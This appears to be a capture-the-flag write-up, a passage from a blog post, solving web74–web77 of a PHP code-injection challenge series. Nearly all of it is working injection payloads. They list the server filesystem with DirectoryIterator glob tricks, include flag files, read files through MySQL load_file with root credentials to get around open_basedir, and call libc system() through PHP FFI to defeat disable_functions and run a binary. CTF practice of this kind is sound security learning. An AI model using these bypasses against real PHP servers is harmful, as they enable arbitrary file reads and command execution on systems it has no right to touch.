c=$a=scandir("/");foreach($a as $key=>$value){echo $key."=>".$value;}exit();
c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit();

The listing shows /flagc.txt; include it directly:

c=include('/flagc.txt');exit();

web74

Topic: shown as a screenshot in the original post.
Solution
Scan the directory. scandir() is disabled, so use the DirectoryIterator class:

c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit();
c=$a=new DirectoryIterator("/");foreach($a as $key=>$value){echo $key."=>".$value;}exit();

Then include the flag directly:

c=include('/flagx.txt');exit();

web75

Solution
Scan the directory with c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit(); which shows flag36.txt.
Read the file through the database (I don't understand this one). Why it works: load_file() is executed by the MySQL server process, which is bound by neither PHP's open_basedir nor its disable_functions, so the database reads the file on PHP's behalf and returns it as a query result.

c=
try {
    $dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');
    foreach ($dbh->query('select load_file("/flag36.txt")') as $row) {
        echo ($row[0]) . "|";
    }
    $dbh = null;
} catch (PDOException $e) {
    echo $e->getMessage();
    exit(0);
}
exit(0);

web76

Solution
Scan the directory with c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit(); and read the flag through the database as in web75:

c=
try {
    $dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');
    foreach ($dbh->query('select load_file("/flag36.txt")') as $row) {
        echo ($row[0]) . "|";
    }
    $dbh = null;
} catch (PDOException $e) {
    echo $e->getMessage();
    exit(0);
}
exit(0);

web77

Solution
Scan the directory with c=$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString().' ');}exit(); and find a /readflag binary, which has to be executed. Use FFI (PHP 7.4+, requires ffi.enable) to call libc's system() directly, bypassing disable_functions, and write the output into the web root:

c=$ffi=FFI::cdef("int system(char *command);", "libc.so.6");$a='/readflag > 1.txt';$ffi->system($a);exit();

Or, listing and executing in one request:

c=
$a=new DirectoryIterator("glob:///*");
foreach($a as $f){
    echo $f."    " ;
}

$ffi = FFI::cdef(
    "int system(const char *command);");

$ffi->system("/readflag > 1.txt");

exit();

Then fetch 1.txt from the web root.

Source: blog.csdn.net/h_adam/article/details/120578810